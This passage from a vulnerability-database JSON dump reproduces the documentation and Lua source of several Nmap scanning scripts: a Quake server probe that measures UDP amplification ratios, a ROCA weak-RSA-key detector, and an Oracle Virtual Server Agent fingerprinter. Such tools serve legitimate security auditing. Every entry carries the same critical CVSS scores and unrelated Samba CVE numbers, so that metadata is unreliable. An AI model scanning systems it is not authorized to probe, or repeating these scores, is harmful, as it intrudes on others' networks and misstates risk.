fragmeister\n | player info exchange payload amplification: 49/6=8.166667\n | client address: 192.168.0.10:40430\n | connect time: 55587 secs\n | frags: -1\n | shirt: green3\n | pants: orange6\n |_ protocol version: released (0x3)\n \n\n## Requires \n\n * [comm](<../lib/comm.html>)\n * [nmap](<../lib/nmap.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": 
"NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2014-03-07T17:28:40", "type": "nmap", "title": "quake1-info NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-09-05T21:57:41", "id": "NMAP:QUAKE1-INFO.NSE", "href": "https://nmap.org/nsedoc/scripts/quake1-info.html", "sourceData": "local comm = require \"comm\"\nlocal nmap = require \"nmap\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal table = require \"table\"\n\ndescription = [[\nExtracts information from Quake game servers and other game servers\nwhich use the same protocol.\n\nQuake uses UDP packets, which because of source spoofing can be used to amplify\na denial-of-service attack. For each request, the script reports the payload\namplification as a ratio. 
The format used is\n<code>response_bytes/request_bytes=ratio</code>\n\nhttp://www.gamers.org/dEngine/quake/QDP/qnp.html\n]]\n\n---\n-- @usage\n-- nmap -n -sU -Pn --script quake1-info -pU:26000-26004 -- <target>\n--\n-- @output\n-- PORT STATE SERVICE\n-- 26000/udp open quake\n-- | quake1-info:\n-- | server info exchange payload amplification: 59/12=4.916667\n-- | listen address: 10.200.200.10:26000\n-- | server name: An anonymous Debian server\n-- | level name: dm1\n-- | players: 1/8\n-- | player table\n-- | player 1: fragmeister\n-- | player info exchange payload amplification: 49/6=8.166667\n-- | client address: 192.168.0.10:40430\n-- | connect time: 55587 secs\n-- | frags: -1\n-- | shirt: green3\n-- | pants: orange6\n-- |_ protocol version: released (0x3)\n--\n-- @xmloutput\n-- <elem key=\"server_ratio\">59/12=4.916667</elem>\n-- <elem key=\"listen_address\">10.200.200.10:26000</elem>\n-- <elem key=\"server_name\">An anonymous Debian server</elem>\n-- <elem key=\"level_name\">dm1</elem>\n-- <elem key=\"players\">1/8</elem>\n-- <table key=\"player_table\">\n-- <table key=\"player 1\">\n-- <elem key=\"player_ratio\">49/6=8.166667</elem>\n-- <elem key=\"name\">fragmeister</elem>\n-- <elem key=\"client_address\">192.168.0.10:40430</elem>\n-- <elem key=\"connect_time\">55587 secs</elem>\n-- <elem key=\"frags\">-1</elem>\n-- <elem key=\"shirt\">green3</elem>\n-- <elem key=\"pants\">orange6</elem>\n-- </table>\n-- </table>\n-- <elem key=\"protocol_version\">released (0x3)</elem>\n\n\ncategories = {\"default\", \"discovery\", \"safe\", \"version\"}\nauthor = \"Ulrik Haugen\"\ncopyright = \"Link\u00f6pings universitet 2014, Ulrik Haugen 2014\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\n\n\n--- Proceed with action on open/open|filtered udp ports in interval\n-- [26000, 26004] and whatever Quake is listed under in nmap-services.\nfunction portrule(host, port)\n return (port.state == 'open' or port.state == 'open|filtered')\n and port.protocol == 
'udp'\n and ((26000 <= port.number and port.number <= 26004)\n or port.service == 'quake')\n and nmap.version_intensity() >= 7\nend\n\n\n--- Like assert but put /message/ in the ERROR key in /results_table/ to\n-- better suit collate_results and pass 0 as level to error to ensure\n-- the error message will not be prefixed with file and line number.\n-- /results_table/ may be left out.\nlocal function assert_w_table(condition, message, results_table)\n if condition then\n return condition\n else\n results_table = results_table or {}\n results_table.ERROR = message\n error(results_table, 0)\n end\nend\n\n\n-- Protocol constants and tables.\nlocal ctrl_pkt_type = 0x8000\nlocal ccreq_server_info = 0x02\nlocal ccrep_server_info = 0x83\nlocal ccreq_player_info = 0x03\nlocal ccrep_player_info = 0x84\nlocal game_name = \"QUAKE\"\nlocal net_protocol_versions = {\n [ 0x01 ] = \"qtest1\",\n [ 0x02 ] = \"unknown\",\n [ 0x03 ] = \"released\"\n}\nlocal net_protocol_released = 0x03\nlocal color_codes = {\n [ 0x0 ] = \"gray0\",\n [ 0x1 ] = \"brown1\",\n [ 0x2 ] = \"lavender2\",\n [ 0x3 ] = \"green3\",\n [ 0x4 ] = \"red4\",\n [ 0x5 ] = \"light green5\",\n [ 0x6 ] = \"orange6\",\n [ 0x7 ] = \"light brown7\",\n [ 0x8 ] = \"violet8\",\n [ 0x9 ] = \"pink9\",\n [ 0xa ] = \"beige10\",\n [ 0xb ] = \"green11\",\n [ 0xc ] = \"yellow12\",\n [ 0xd ] = \"blue13\"\n}\n\n\n--- Request player info from /host/:/port/ for player /id/, return\n-- player info as a table on success and raise an error on failure.\nlocal function get_player_info(host, port, id)\n local player_info = stdnse.output_table()\n local req_pl = string.pack('>I2 I2 BB',\n ctrl_pkt_type, -- packet type\n 2+2+1+1, -- packet length\n ccreq_player_info, -- operation code\n id - 1) -- player number (0 indexed)\n -- iptables -m u32 --u32 '0x1c=0x80000006&&0x1d&0xff=0x03'\n\n local status, rep_pl = comm.exchange(host, port, req_pl)\n assert_w_table(status, \"No response to request for player info\")\n assert_w_table(#rep_pl >= 4, 
\"Response too small for packet header\")\n\n player_info.player_ratio = string.format(\"%d/%d=%f\",\n rep_pl:len(), req_pl:len(),\n rep_pl:len()/req_pl:len() )\n\n local rep_pkt_type, rep_pl_len, pos = string.unpack('>I2 I2', rep_pl)\n assert_w_table(rep_pl_len == rep_pl:len(),\n string.format(\"Incorrect reply packet length: %d\"\n .. \" received, %d bytes in packet\",\n rep_pl_len, rep_pl:len()),\n player_info)\n local term_pos = rep_pl_len + 1\n assert_w_table(rep_pkt_type == ctrl_pkt_type,\n \"Bad reply packet type\", player_info)\n\n -- frags and connect_time are sent little endian:\n local rep_opc, player_id, name, colors, frags, connect_time, client_address, pos = string.unpack('>BBzBxxx<i4I4>z', rep_pl, pos)\n assert_w_table(pos == term_pos, \"Error parsing reply (packet type/ length)\",\n player_info)\n assert_w_table(rep_opc == ccrep_player_info,\n string.format(\"Incorrect operation code 0x%x in reply,\"\n .. \" should be 0x%x\",\n rep_opc, ccrep_player_info),\n player_info)\n\n player_info.name = name\n player_info.client_address = client_address\n player_info.connect_time = string.format(\"%d secs\", connect_time)\n player_info.frags = frags\n player_info.shirt = color_codes[colors >> 4] or \"INVALID\"\n player_info.pants = color_codes[colors & 0x0f] or \"INVALID\"\n return player_info\nend\n\n\n--- Request player info from /host/:/port/ for players [1,\n-- /cur_players/], return player infos or errors in a table.\nlocal function get_player_table(host, port, cur_players)\n local player_table = stdnse.output_table()\n for id = 1, cur_players do\n -- At this point we have established that the target is a Quake\n -- game server so lost ccreq or ccrep player info packets are\n -- merely noted in the output, they don't abort the script.\n local status, player_info = pcall(get_player_info, host, port, id)\n player_table[string.format(\"player %d\", id)] = player_info\n end\n return player_table\nend\n\n\n--- Request server info and possibly player infos 
from /host/:/port/,\n-- return server info and any player infos as a table on success and\n-- raise an error on failure.\nlocal function get_server_info(host, port)\n local server_info = stdnse.output_table()\n local req_pl = string.pack('>I2I2BzB',\n ctrl_pkt_type, -- packet type\n 2+2+1+game_name:len()+1+1, -- packet length\n ccreq_server_info, -- operation code\n game_name,\n net_protocol_released) -- net protocol version\n -- iptables -m u32 --u32 '0x1c=0x8000000c&&0x20=0x02515541&&0x24=0x4b450003'\n\n local status, rep_pl = comm.exchange(host, port, req_pl)\n assert_w_table(status, \"No response to request for server info\")\n assert_w_table(#rep_pl >= 4, \"Response too small for packet header\")\n\n nmap.set_port_state(host, port, 'open')\n server_info.server_ratio = string.format(\"%d/%d=%f\",\n rep_pl:len(), req_pl:len(),\n rep_pl:len()/req_pl:len())\n\n local rep_pkt_type, rep_pl_len, pos = string.unpack('>I2 I2', rep_pl)\n assert_w_table(rep_pkt_type == ctrl_pkt_type,\n string.format(\"Bad reply packet type 0x%x, expected 0x%x\",\n rep_pkt_type, ctrl_pkt_type), server_info)\n assert_w_table(rep_pl_len == rep_pl:len(),\n string.format(\"Bad reply packet length: %d received,\"\n .. \" %d bytes in packet\",\n rep_pl_len, rep_pl:len()), server_info)\n local term_pos = rep_pl_len + 1\n\n local rep_opc, pos = string.unpack('>B', rep_pl, pos)\n assert_w_table(rep_opc == ccrep_server_info,\n string.format(\"Bad operation code 0x%x in reply,\"\n .. 
\" expected 0x%x\",\n rep_opc, ccrep_server_info), server_info)\n local server_address, server_host_name, level_name, cur_players, max_players, net_protocol_version, pos = string.unpack('>zzzBBB', rep_pl, pos)\n assert_w_table(pos == term_pos, \"Error parsing reply (packet type/length)\",\n server_info)\n\n port.version.name = \"quake\"\n port.version.product = \"Quake 1 server\"\n port.version.version = net_protocol_versions[net_protocol_version]\n nmap.set_port_version(host, port)\n\n local player_table = get_player_table(host, port, cur_players)\n\n server_info.listen_address = server_address\n server_info.server_name = server_host_name\n server_info.level_name = level_name\n server_info.players = string.format(\"%d/%d\", cur_players, max_players)\n server_info.player_table = player_table\n server_info.protocol_version = string.format(\n \"%s (0x%x)\",\n net_protocol_versions[net_protocol_version], net_protocol_version)\n return server_info\nend\n\n\n--- Return a function from structured to unstructured output indenting\n-- nested tables /offset/ or two spaces with special treatment of name\n-- keys and optionally using /xlate_key/ to format keys.\nlocal function make_formatter(offset, xlate_key)\n offset = offset or 2\n xlate_key = xlate_key or function(key) return key:gsub(\"_\", \" \") end\n\n --- Format /results_table/ as a string starting /indent/ or zero\n -- steps from the margin for the name key and adding offset steps\n -- for other table contents and again for the contents of nested\n -- tables.\n local function formatter(results_table, indent)\n indent = indent or 0\n local output = {}\n\n if results_table.name then\n table.insert(output,\n string.format(\"%s%s\", ({ [ false ] = \": \",\n [ true ] = \"\\n\" })[indent == 0],\n results_table.name))\n end\n\n for key, value in pairs(results_table) do\n -- name is printed already\n if key ~= 'name' then\n if type(value) == 'table' then\n table.insert(output,\n string.format(\"\\n%s%s\",\n string.rep(\" 
\", indent + offset),\n xlate_key(key)))\n table.insert(output, formatter(value, indent + offset))\n else\n table.insert(output,\n string.format(\"\\n%s%s: %s\",\n string.rep(\" \", indent + offset),\n xlate_key(key), value))\n end\n end\n end\n return table.concat(output, '')\n end\n\n return formatter\nend\n\n\n--- Use /formatter/ to produce unstructured output from\n-- /results_table/ considering /status/. Return structured and\n-- unstructured output.\nlocal function collate_results(formatter, status, results_table)\n if not status and nmap.debugging() < 1 then\n return nil\n end\n return results_table, formatter(results_table)\nend\n\n\n--- Nmap entry point.\nfunction action(host, port)\n local xlate_table = {\n player_ratio = \"player info exchange payload amplification\",\n server_ratio = \"server info exchange payload amplification\",\n }\n\n local function xlate_key(key)\n return xlate_table[key] or key:gsub(\"_\", \" \")\n end\n\n return collate_results(make_formatter(nil, xlate_key),\n pcall(get_server_info, host, port))\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:31:03", "description": "Detects RSA keys vulnerable to Return Of Coppersmith Attack (ROCA) factorization. \n\nSSH hostkeys and SSL/TLS certificates are checked. The checks require recent updates to the openssl NSE library. \n\nReferences: \n\n * <https://crocs.fi.muni.cz/public/papers/rsa_ccs17>\n\n### See also:\n\n * [ ssl-cert.nse ](<../scripts/ssl-cert.html>)\n * [ ssh-hostkey.nse ](<../scripts/ssh-hostkey.html>)\n\n## Script Arguments \n\n#### mssql.domain, mssql.instance-all, mssql.instance-name, mssql.instance-port, mssql.password, mssql.protocol, mssql.scanned-ports-only, mssql.timeout, mssql.username \n\nSee the documentation for the [mssql](<../lib/mssql.html#script-args>) library. 
\n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the [smbauth](<../lib/smbauth.html#script-args>) library. \n\n#### tls.servername \n\nSee the documentation for the [tls](<../lib/tls.html#script-args>) library. \n\n#### smtp.domain \n\nSee the documentation for the [smtp](<../lib/smtp.html#script-args>) library. \n\n#### randomseed, smbbasic, smbport, smbsign \n\nSee the documentation for the [smb](<../lib/smb.html#script-args>) library. \n\n#### vulns.short, vulns.showall \n\nSee the documentation for the [vulns](<../lib/vulns.html#script-args>) library. \n\n## Example Usage \n \n \n nmap -p 22,443 --script rsa-vuln-roca <target>\n \n\n## Script Output \n\n\n## Requires \n\n * [stdnse](<../lib/stdnse.html>)\n * [openssl](<../lib/openssl.html>)\n * [nmap](<../lib/nmap.html>)\n * [shortport](<../lib/shortport.html>)\n * [ssh2](<../lib/ssh2.html>)\n * [sslcert](<../lib/sslcert.html>)\n * [math](<>)\n * [string](<>)\n * [vulns](<../lib/vulns.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-10-18T20:26:42", "type": "nmap", "title": "rsa-vuln-roca NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, 
"impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-10-24T19:36:04", "id": "NMAP:RSA-VULN-ROCA.NSE", "href": "https://nmap.org/nsedoc/scripts/rsa-vuln-roca.html", "sourceData": "local stdnse = require \"stdnse\"\nlocal openssl = stdnse.silent_require \"openssl\"\nlocal nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal ssh2 = require \"ssh2\"\nlocal sslcert = require \"sslcert\"\nlocal math = require \"math\"\nlocal string = require \"string\"\nlocal vulns = require \"vulns\"\n\ndescription = [[\nDetects RSA keys vulnerable to Return Of Coppersmith Attack (ROCA) factorization.\n\nSSH hostkeys and SSL/TLS certificates are checked. The checks require recent updates to the openssl NSE library.\n\nReferences:\n* https://crocs.fi.muni.cz/public/papers/rsa_ccs17\n]]\n\n---\n-- @usage\n-- nmap -p 22,443 --script rsa-vuln-roca <target>\n--\n-- @output\n--\n--@xmloutput\n--\n-- @see ssl-cert.nse\n-- @see ssh-hostkey.nse\n\nauthor = \"Daniel Miller\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"vuln\", \"safe\"}\n\n-- only run this script if the target host is NOT a private (RFC1918) IP address)\n-- and the port is an open SSL service\nportrule = function(host, port)\n if not openssl.bignum_div then\n stdnse.verbose1(\"This script requires the latest update to NSE's openssl library bindings.\")\n return false\n end\n -- SSH key check\n return shortport.port_or_service(22, \"ssh\")\n -- same criteria as ssl-cert.nse\n or shortport.ssl(host, port) or sslcert.isPortSupported(port) or sslcert.getPrepareTLSWithoutReconnect(port)\nend\n\nlocal function is_vulnerable (modulus)\n local dec2bn = openssl.bignum_dec2bn\n -- Prime tests used under MIT license from https://github.com/crocs-muni/roca\n local prime_tests = nmap.registry.roca_prime_tests or {\n {dec2bn(\"3\"), dec2bn(\"6\")},\n {dec2bn(\"5\"), dec2bn(\"30\")},\n {dec2bn(\"7\"), dec2bn(\"126\")},\n 
{dec2bn(\"11\"), dec2bn(\"1026\")},\n {dec2bn(\"13\"), dec2bn(\"5658\")},\n {dec2bn(\"17\"), dec2bn(\"107286\")},\n {dec2bn(\"19\"), dec2bn(\"199410\")},\n {dec2bn(\"23\"), dec2bn(\"8388606\")},\n {dec2bn(\"29\"), dec2bn(\"536870910\")},\n {dec2bn(\"31\"), dec2bn(\"2147483646\")},\n {dec2bn(\"37\"), dec2bn(\"67109890\")},\n {dec2bn(\"41\"), dec2bn(\"2199023255550\")},\n {dec2bn(\"43\"), dec2bn(\"8796093022206\")},\n {dec2bn(\"47\"), dec2bn(\"140737488355326\")},\n {dec2bn(\"53\"), dec2bn(\"5310023542746834\")},\n {dec2bn(\"59\"), dec2bn(\"576460752303423486\")},\n {dec2bn(\"61\"), dec2bn(\"1455791217086302986\")},\n {dec2bn(\"67\"), dec2bn(\"147573952589676412926\")},\n {dec2bn(\"71\"), dec2bn(\"20052041432995567486\")},\n {dec2bn(\"73\"), dec2bn(\"6041388139249378920330\")},\n {dec2bn(\"79\"), dec2bn(\"207530445072488465666\")},\n {dec2bn(\"83\"), dec2bn(\"9671406556917033397649406\")},\n {dec2bn(\"89\"), dec2bn(\"618970019642690137449562110\")},\n {dec2bn(\"97\"), dec2bn(\"79228162521181866724264247298\")},\n {dec2bn(\"101\"), dec2bn(\"2535301200456458802993406410750\")},\n {dec2bn(\"103\"), dec2bn(\"1760368345969468176824550810518\")},\n {dec2bn(\"107\"), dec2bn(\"50079290986288516948354744811034\")},\n {dec2bn(\"109\"), dec2bn(\"473022961816146413042658758988474\")},\n {dec2bn(\"113\"), dec2bn(\"10384593717069655257060992658440190\")},\n {dec2bn(\"127\"), dec2bn(\"144390480366845522447407333004847678774\")},\n {dec2bn(\"131\"), dec2bn(\"2722258935367507707706996859454145691646\")},\n {dec2bn(\"137\"), dec2bn(\"174224571863520493293247799005065324265470\")},\n {dec2bn(\"139\"), dec2bn(\"696898287454081973172991196020261297061886\")},\n {dec2bn(\"149\"), dec2bn(\"713623846352979940529142984724747568191373310\")},\n {dec2bn(\"151\"), dec2bn(\"1800793591454480341970779146165214289059119882\")},\n {dec2bn(\"157\"), dec2bn(\"126304807362733370595828809000324029340048915994\")},\n {dec2bn(\"163\"), dec2bn(\"11692013098647223345629478661730264157247460343806\")},\n 
{dec2bn(\"167\"), dec2bn(\"187072209578355573530071658587684226515959365500926\")},\n }\n nmap.registry.roca_prime_tests = prime_tests\n\n --stdnse.debug1(\"Testing %s\", openssl.bignum_bn2dec(modulus))\n for _, test in ipairs(prime_tests) do\n local prime, fingerprint = test[1], test[2]\n local _, bnshift = openssl.bignum_div(modulus, prime)\n -- prime is small, so bnshift is small. Safe to convert to Lua integer\n local string_shift = openssl.bignum_bn2dec(bnshift)\n local shift = math.tointeger(string_shift)\n if not shift then\n stdnse.debug1(\"Unable to convert %s to integer\", string_shift)\n return nil\n end\n --stdnse.debug1(\"Testing mod %s, shift is %s\", openssl.bignum_bn2dec(prime), shift)\n if not openssl.bignum_is_bit_set(fingerprint, shift) then\n stdnse.debug1(\"Not vulnerable\")\n return nil\n end\n end\n stdnse.debug1(\"VULNERABLE!!!!!!\")\n\n return \"Vulnerable to ROCA\"\nend\n\nlocal function ssl_get_modulus(host, port)\n local ok, cert = sslcert.getCertificate(host, port)\n if not ok then\n stdnse.debug1(\"failed to obtain SSL certificate\")\n return nil\n end\n\n if cert.pubkey.type ~= \"rsa\" then\n stdnse.debug1(\"Non-RSA certificate, not vulnerable to ROCA\")\n return nil\n end\n\n local modulus = cert.pubkey.modulus\n if not modulus then\n stdnse.debug1(\"No modulus available; upgrade Nmap?\")\n return nil\n end\n return modulus\nend\n\nlocal function ssh_get_modulus(host, port)\n local key = ssh2.fetch_host_key( host, port, \"ssh-rsa\" )\n if not key then\n stdnse.debug1(\"No RSA hostkey, not vulnerable to ROCA\")\n return nil\n end\n local _, e, n = string.unpack(\">s4s4s4\", key.fp_input)\n return openssl.bignum_bin2bn(n)\nend\n\naction = function(host, port)\n local vuln_table = {\n title = \"ROCA: Vulnerable RSA generation\",\n state = vulns.STATE.NOT_VULN,\n -- TODO: Update when CVE is scored\n --risk_factor = \"High\",\n description = [[\n The Infineon RSA library 1.02.013 in Infineon Trusted Platform Module (TPM)\n firmware, such 
as versions before 0000000000000422 - 4.34, before\n 000000000000062b - 6.43, and before 0000000000008521 - 133.33, mishandles\n RSA key generation, which makes it easier for attackers to defeat various\n cryptographic protection mechanisms via targeted attacks, aka ROCA.\n ]],\n IDS = {CVE = \"CVE-2017-15361\"},\n references = {\n \"https://crocs.fi.muni.cz/public/papers/rsa_ccs17\",\n }\n }\n\n local report = vulns.Report:new(SCRIPT_NAME, host, port)\n local modulus\n if shortport.ssl(host, port) or sslcert.isPortSupported(port) or sslcert.getPrepareTLSWithoutReconnect(port) then\n modulus = ssl_get_modulus(host, port)\n elseif shortport.port_or_service(22, \"ssh\")(host, port) then\n modulus = ssh_get_modulus(host, port)\n end\n\n if modulus and is_vulnerable(modulus) then\n vuln_table.state = vulns.STATE.VULN\n end\n return report:make_output(vuln_table)\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:38:51", "description": "Detects the version of an Oracle Virtual Server Agent by fingerprinting responses to an HTTP GET request and an XML-RPC method call. \n\nVersion 2.2 of Virtual Server Agent returns a distinctive string in response to an HTTP GET request. However versions 3.0 and 3.0.1 return a generic response that looks like any other BaseHTTP/SimpleXMLRPCServer. Versions 2.2 and 3.0 return a distinctive error message in response to a `system.listMethods` XML-RPC call, which however does not distinguish the two versions. Version 3.0.1 returns a response to `system.listMethods` that is different from that of both version 2.2 and 3.0. Therefore we use this strategy: (1.) Send a GET request. If the version 2.2 string is returned, return \"2.2\". (2.) Send a `system.listMethods` method call. 
If an error is returned, return \"3.0\" or \"3.0.1\", depending on the specific format of the error.\n\n## Script Arguments \n\n#### slaxml.debug \n\nSee the documentation for the [slaxml](<../lib/slaxml.html#script-args>) library. \n\n#### http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent \n\nSee the documentation for the [http](<../lib/http.html#script-args>) library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the [smbauth](<../lib/smbauth.html#script-args>) library. \n\n## Example Usage \n \n \n nmap -sV <target>\n\n## Script Output \n \n \n PORT STATE SERVICE REASON VERSION\n 8899/tcp open ssl/ovs-agent syn-ack Oracle Virtual Server Agent 3.0 (BaseHTTP 0.3; Python SimpleXMLRPCServer; Python 2.5.2)\n\n## Requires \n\n * [http](<../lib/http.html>)\n * [nmap](<../lib/nmap.html>)\n * [shortport](<../lib/shortport.html>)\n * [string](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2011-03-02T07:39:31", "type": "nmap", "title": "ovs-agent-version NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2015-11-05T20:41:05", "id": "NMAP:OVS-AGENT-VERSION.NSE", "href": "https://nmap.org/nsedoc/scripts/ovs-agent-version.html", "sourceData": "local http = require \"http\"\nlocal nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal string = require \"string\"\n\ndescription = [[\nDetects the version of an Oracle Virtual Server Agent by fingerprinting\nresponses to an HTTP GET request and an XML-RPC method call.\n\nVersion 2.2 of Virtual Server Agent returns a distinctive string in response to an\nHTTP GET request. However versions 3.0 and 3.0.1 return a generic response that\nlooks like any other BaseHTTP/SimpleXMLRPCServer. Versions 2.2 and 3.0 return a\ndistinctive error message in response to a <code>system.listMethods</code>\nXML-RPC call, which however does not distinguish the two versions. Version 3.0.1\nreturns a response to <code>system.listMethods</code> that is different from\nthat of both version 2.2 and 3.0. Therefore we use this strategy: (1.) Send a\nGET request. If the version 2.2 string is returned, return \"2.2\". (2.) Send a\n<code>system.listMethods</code> method call. 
If an error is\nreturned, return \"3.0\" or \"3.0.1\", depending on the specific format of the\nerror.\n]]\n\ncategories = {\"version\"}\n\n---\n-- @output\n-- PORT STATE SERVICE REASON VERSION\n-- 8899/tcp open ssl/ovs-agent syn-ack Oracle Virtual Server Agent 3.0 (BaseHTTP 0.3; Python SimpleXMLRPCServer; Python 2.5.2)\n\nauthor = \"David Fifield\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\n\n\nportrule = shortport.version_port_or_service({8899})\n\nlocal function set_port_version(host, port, version, server)\n port.version.name = \"ovs-agent\"\n port.version.product = \"Oracle Virtual Server Agent\"\n port.version.version = version\n if server then\n local basehttp, python = string.match(server, \"^BaseHTTP/([%d.]+) Python/([%d.]+)\")\n if basehttp and python then\n port.version.extrainfo = string.format(\"BaseHTTP %s; Python SimpleXMLRPCServer; Python %s\", basehttp, python)\n end\n end\n nmap.set_port_version(host, port)\nend\n\nfunction action(host, port)\n local response\n local version = {}\n\n response = http.get(host, port, \"/\")\n if response.status == 200 and string.match(response.body,\n \"<title>Python: OVSAgentServer Document</title>\") then\n set_port_version(host, port, \"2.2\", response.header[\"server\"])\n return\n end\n\n -- So much for version 2.2. 
If the response to GET was 501, then we may\n -- have a version 3.0 or 3.0.1.\n if not (response.status == 501) then\n return\n end\n\n response = http.post(host, port, \"/\",\n {header = {[\"Content-Type\"] = \"text/xml\"}}, nil,\n \"<methodCall><methodName>system.listMethods</methodName><params></params></methodCall>\")\n if response.status == 403 and string.match(response.body,\n \"Message: Unauthorized HTTP Access Attempt from %('[%d.]+', %d+%)!%.\") then\n set_port_version(host, port, \"3.0\", response.header[\"server\"])\n return\n elseif response.status == 403 and string.match(response.body,\n \"Message: Unauthorized access attempt from %('[%d.]+', %d+%)!%.\") then\n set_port_version(host, port, \"3.0.1\", response.header[\"server\"])\n return\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:47:24", "description": "Discovers and enumerates BACNet Devices collects device information based off standard requests. In some cases, devices may not strictly follow the specifications, or may comply with older versions of the specifications, and will result in a BACNET error response. Presence of this error positively identifies the device as a BACNet device, but no enumeration is possible. \n\nNote: Requests and responses are via UDP 47808, ensure scanner will receive UDP 47808 source and destination responses. 
\n\n<http://digitalbond.com>\n\n## Example Usage \n \n \n nmap --script bacnet-info -sU -p 47808 <host>\n \n\n## Script Output \n \n \n 47808/udp open bacnet\n | bacnet-discover:\n | Vendor ID: BACnet Stack at SourceForge (260)\n | Vendor Name: BACnet Stack at SourceForge\n | Instance Number: 260001\n | Firmware: 0.8.2\n | Application Software: 1.0\n | Object Name: SimpleServer\n | Model Name: GNU\n | Description: server\n |_ Location: USA\n \n\n## Requires \n\n * [nmap](<../lib/nmap.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [unicode](<../lib/unicode.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2014-05-28T13:54:05", "type": "nmap", "title": "bacnet-info NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2020-03-01T16:31:34", "id": "NMAP:BACNET-INFO.NSE", "href": "https://nmap.org/nsedoc/scripts/bacnet-info.html", "sourceData": "local 